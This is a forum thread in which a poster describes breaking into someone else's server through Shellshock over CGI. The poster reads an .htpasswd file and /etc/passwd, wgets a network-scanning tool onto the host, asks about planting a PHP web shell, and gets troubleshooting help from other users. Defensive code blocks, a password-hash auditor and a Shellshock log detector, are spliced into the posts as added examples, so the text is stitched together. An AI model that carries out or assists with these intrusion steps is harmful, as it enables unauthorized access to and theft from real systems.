
Ok guys help me own this network.

  1. #1
    Sophie Pedophile Tech Support
    Alright so i haxxed me a server right. I've been on the shellshock tour lately. Pic related.

    I am currently www-data and when i:

    find ~ -print


    I get to see everything that's in /var/www, an interesting entry was /var/www/admin/.htpasswd so i cat that puppy.



    Then when i ran:

    dpkg --list


    I saw that they also have a python install, pic related.

    Now would it be possible that i get my PyCat tool onto the server with:


    wget -O /etc/ "https://github.com/NullArray/PyCat/archive/master.zip"


    And then:


    unzip master.zip -d /etc/


    Then run it like:

    python /etc/PyCat.py


    The purpose of this would be to run my script obviously, and my script scans the local network and allows me to interact with any hosts that are up see my repo for details on my tool if you are interested.

    https://github.com/NullArray/PyCat

    Alternatively would it be possible to "wget" a php shell to /var/www? And if so, what would be the best way possible to access it after doing so?
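    The defender-side lesson of this post is the .htpasswd sitting under /var/www where the web server account can read it. The following audit script is an added example, not code from the thread or from the PyCat project; it flags an .htpasswd placed inside the document root and any entries using legacy hash schemes (apr1, MD5-crypt, unsalted SHA-1, DES crypt). The user names and hash values are constructed.

```python
import re
from typing import Dict

# Constructed sample .htpasswd content (hypothetical users, not the thread's file).
SAMPLE_HTPASSWD = """\
alice:$apr1$AbCdEfGh$0123456789abcdefghijkl.
bob:$1$AbCdEfGh$0123456789abcdefghijkl.
carol:AbCdEfGhIjKlM
dave:{SHA}AbCdEfGhIjKlMnOpQrStUvWxYz0=
erin:$2y$10$AbCdEfGhIjKlMnOpQrStUuVwXyZ0123456789abcdefghijklmnop
"""

# Schemes that should be rehashed: fast or unsalted digests, or crypt(3) with an 8-char limit.
WEAK_SCHEMES = {
    "$apr1$": "apr1 (iterated MD5)",
    "$1$": "MD5-crypt",
    "{SHA}": "unsalted SHA-1",
}
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")
BCRYPT = re.compile(r"^\$2[aby]\$\d{2}\$")


def classify(hash_field: str) -> str:
    """Name the hash scheme of one .htpasswd password field."""
    if BCRYPT.match(hash_field):
        return "bcrypt"
    for prefix, name in WEAK_SCHEMES.items():
        if hash_field.startswith(prefix):
            return name
    if DES_CRYPT.match(hash_field):
        return "DES crypt (8-char limit)"
    return "unknown"


def audit_htpasswd(content: str, path: str, docroot: str) -> Dict[str, object]:
    """Report entries needing a rehash and whether the file lives under the docroot."""
    weak: Dict[str, str] = {}
    for line in content.splitlines():
        if not line.strip() or ":" not in line:
            continue
        user, hash_field = line.split(":", 1)
        scheme = classify(hash_field)
        if scheme != "bcrypt":
            weak[user] = scheme
    # Apache's default config refuses to serve .ht* files, but anything under the
    # document root is still readable by code running as the web server account.
    in_docroot = path.startswith(docroot.rstrip("/") + "/")
    return {"weak": weak, "in_docroot": in_docroot}


if __name__ == "__main__":
    report = audit_htpasswd(SAMPLE_HTPASSWD, "/var/www/admin/.htpasswd", "/var/www")
    for user, scheme in report["weak"].items():
        print(f"{user}: {scheme} -> rehash with bcrypt")
    if report["in_docroot"]:
        print("file is inside the document root: move it outside and reference it by absolute path")
```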
  2. #2
    -SpectraL coward [the spuriously bluish-lilac bushman]
    You'd need a data pipe setup.
  3. #3
    Sophie Pedophile Tech Support


    Eh, got my shit on there, yet their python won't run my scripts. Any thoughts anyone?
  4. #4
    You'd need a data pipe setup.
    You need a lobotomy.
  5. #5
    Lanny Bird of Courage


    Eh, got my shit on there, yet their python won't run my scripts. Any thoughts anyone?


    What happens when you try to run your python script? Syntax error probably indicates python 2/3 conflict (the vast majority of prod servers only run 2.x, often a major version or two behind). If it's "permission denied" then you'll need to set the execution bit on the file (chmod +x PyCat.py), which you should be able to do since you're the file owner.
  6. #6
    -SpectraL coward [the spuriously bluish-lilac bushman]
    I would say it did run, it's just you didn't get the return output.
  7. #7
    Sophie Pedophile Tech Support
    I would say it did run, it's just you didn't get the return output.

    I've considered that, however besides my python script i also was able to get a shellscript on the server to enumerate services, processes, users and cronjobs, and that did return output. I think the problem may be that the www-data user doesn't have the privilege to execute things in the directory where python resides. I probably need an exploit to escalate my privilege, but i've been working on that for the last couple hours and haven't been able to do it yet, as it's no trivial matter.
  8. #8
    Sophie Pedophile Tech Support
    What happens when you try to run your python script? Syntax error probably indicates python 2/3 conflict (the vast majority of prod servers only run 2.x, often a major version or two behind). If it's "permission denied" then you'll need to set the execution bit on the file (chmod +x PyCat.py), which you should be able to do since you're the file owner.

    When i try to run the script i just don't get any output at all. No syntax error, no permission denied nothing. Like i said in my post above i don't think i have the privilege to execute python itself.
  9. #9
    Lanny Bird of Courage
    How long does it take to execute on your local? You're using the shellshock through CGI exploit right? Spectral, miracle of miracles, could actually be right here. The webserver will timeout your connection if your process doesn't terminate within a certain timeframe (I think it's in the ballpark of 30 seconds, but depending on how conservative the webmaster is and how much traffic they experience it could be higher or lower).
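    Post #9 names the entry point as Shellshock through CGI. From the defender's side that marker is visible in the web server's access log, so here is an added example, not code from the thread, that scans Apache combined-format lines for the bash function-definition marker in the Referer or User-Agent header; the log lines, hosts and paths are constructed.

```python
import re
from typing import Dict, List

# Constructed Apache combined-format log lines (hypothetical hosts and paths).
SAMPLE_LOG = """\
198.51.100.4 - - [24/Sep/2014:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Sep/2014:10:12:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 17 "-" "() { :; }; echo probe"
203.0.113.7 - - [24/Sep/2014:10:12:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 17 "() {:;}; echo probe" "curl/7.37.0"
198.51.100.9 - - [24/Sep/2014:10:13:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 17 "-" "curl/7.37.0"
"""

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The bash exported-function marker Shellshock relies on: "() {" at the start of a
# header value, optionally with whitespace. Similar to the OWASP CRS Shellshock rule.
SHELLSHOCK = re.compile(r"\(\s*\)\s*\{")


def scan_access_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per request whose Referer or User-Agent carries the marker."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format; skip rather than guess at fields
        for field in ("ua", "referer"):
            if SHELLSHOCK.search(m.group(field)):
                findings.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "path": m.group("path"),
                    "field": field,
                    # Requests into /cgi-bin/ are where the marker actually reaches bash.
                    "cgi": "yes" if m.group("path").startswith("/cgi-bin/") else "no",
                })
                break  # one finding per line
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} marker in {f['field']} cgi={f['cgi']}")
```

    A hit on a CGI path that also returned 200 is worth correlating with process accounting or auditd records for child processes of the web server account around that timestamp.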
  10. #10
    Sophie Pedophile Tech Support
    How long does it take to execute on your local?

    What do you mean? How long does the script take to execute on my local machine? Well if i run it, it's done in a second but it will remain scanning until i CTRL+C to interrupt after which it calls my usage function to display my options and help information.

    You're using the shellshock through CGI exploit right?

    Correct.

    Spectral, miracle of miracles, could actually be right here. The webserver will timeout your connection if your process doesn't terminate within a certain timeframe (I think it's in the ballpark of 30 seconds, but depending on how conservative the webmaster is and how much traffic they experience it could be higher or lower).

    Alright but commix, the tool i'm using to interact with the webserver through a pseudo-shell, always notifies me when the connection gets timed out and i did not see this happen.
  11. #11
    Lanny Bird of Courage
    What do you mean? How long does the script take to execute on my local machine? Well if i run it, it's done in a second but it will remain scanning until i CTRL+C to interrupt after which it calls my usage function to display my options and help information.

    Ahh, that's your issue.

    Alright but commix, the tool i'm using to interact with the webserver through a pseudo-shell, always notifies me when the connection gets timed out and i did not see this happen.

    So maybe the timeout never comes, but we wouldn't expect to get output either way. CGI's usual execution model is that it maps a url to a file on the server, executes the file (spawns a process) and buffers standard out from that file until the process terminates and then returns all that data as an HTTP response. It's a very unixy way of doing things. Anyway, if you need to send ctrl-C to terminate then your CGI is going to either time out or wait on that process forever. Try doing something like "python PyCat.py > foobar.txt" and after some delay (waiting for your program to produce output) "cat foobar.txt" and you should see your output.
  12. #12
    Sophie Pedophile Tech Support
    Ahh, that's your issue.



    So maybe the timeout never comes, but we wouldn't expect to get output either way. CGI's usual execution model is that it maps a url to a file on the server, executes the file (spawns a process) and buffers standard out from that file until the process terminates and then returns all that data as an HTTP response. It's a very unixy way of doing things. Anyway, if you need to send ctrl-C to terminate then your CGI is going to either time out or wait on that process forever. Try doing something like "python PyCat.py > foobar.txt" and after some delay (waiting for your program to produce output) "cat foobar.txt" and you should see your output.

    Ah yeah, just dump my output then, good call. I'll try that.
  13. #13
    Sophie Pedophile Tech Support
    Well i did it, output.txt was successfully created but when i cat it, it gave no results. However they have an nmap install, i am going to try to use that to scan their local network.
  14. #14
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Like I said, you'd need to create a "pipe" in order to get the return input. This is a situation where the return output does not go to the local machine at all, but is routed remotely instead.
  15. #15
    Sophie Pedophile Tech Support
    Like I said, you'd need to create a "pipe" in order to get the return input. This is a situation where the return output does not go to the local machine at all, but is routed remotely instead.

    I don't think you get what exactly is going on here Spectral. I appreciate you're trying to help but let's break down what's up. I have a connection via a program from my terminal to a bash shell on the server. Any commands i send get run on the server and all output gets retrieved by my program over this connection. Say now for instance i want the output of any command i give saved to a text file on the server so that i can retrieve it later. What i would do is send a command to append the output to a text file and that's exactly what i did.

    For example:


    cat /etc/passwd > /tmp/output.txt


    This is going to retrieve for me the entries in 'passwd' and dump them to a text file on the server in the /tmp/ directory under the name output.txt. Then when i want to retrieve the content of the text file to my own terminal i can use this command:


    cat /tmp/output.txt


    Because i didn't tell the bash shell on the server to save the output to a text file this time, my program is going to retrieve the contents of output.txt and print it to my own terminal.


    The problem here seemed to be as Lanny pointed out:

    CGI's usual execution model is that it maps a url to a file on the server, executes the file (spawns a process) and buffers standard out from that file until the process terminates and then returns all that data as a HTTP response.

    This is fine, however since the process of my script only terminates on a keyboard interrupt, the CGI is going to either time out or wait on that process forever before returning output, like Lanny said. So in order to prevent a timeout i have to make it so my program isn't going to be trying to retrieve the output for more than around 30 seconds. This is why i needed to append the output to a text file that is local to the server. This command was employed to that effect:


    /usr/bin/python /tmp/PyCat.py > /tmp/output.txt


    Then when i listed the contents of the /tmp/ directory on the server i saw that my output file had been successfully created, however the problem seems to be that the script itself ran but no output was dumped to the text file. What i also think you may not have realized is that my script was ON the server in the /tmp/ directory after i put it there with the 'wget' command.
  16. #16
    -SpectraL coward [the spuriously bluish-lilac bushman]
    No, it's you who doesn't understand.
  17. #17
    Lanny Bird of Courage
    No, it's you who doesn't understand.

    Spectral tech posts in a nutshell. "NO U!"
  18. #18
    Sophie Pedophile Tech Support
    No, it's you who doesn't understand.

    Instead of saying NO U! Why don't you go ahead and explain to me exactly what's going on in detail and tell me just how wrong i am?

    Protip: You can't.
  19. #19
    -SpectraL coward [the spuriously bluish-lilac bushman]
    It's all about context permissions. You need an app redirect.
  20. #20
    Sophie Pedophile Tech Support
    all about permissions..

    Like i mentioned in this post long before you mentioned it http://niggasin.space/forum/technoph...4374#post44374 i had considered that as well. However the issue from Lanny's post was equally plausible. What's more you have not demonstrated how it is:

    Sophie doesn't understand.

    And that's because i have been right, and perfectly understand what's being discussed here.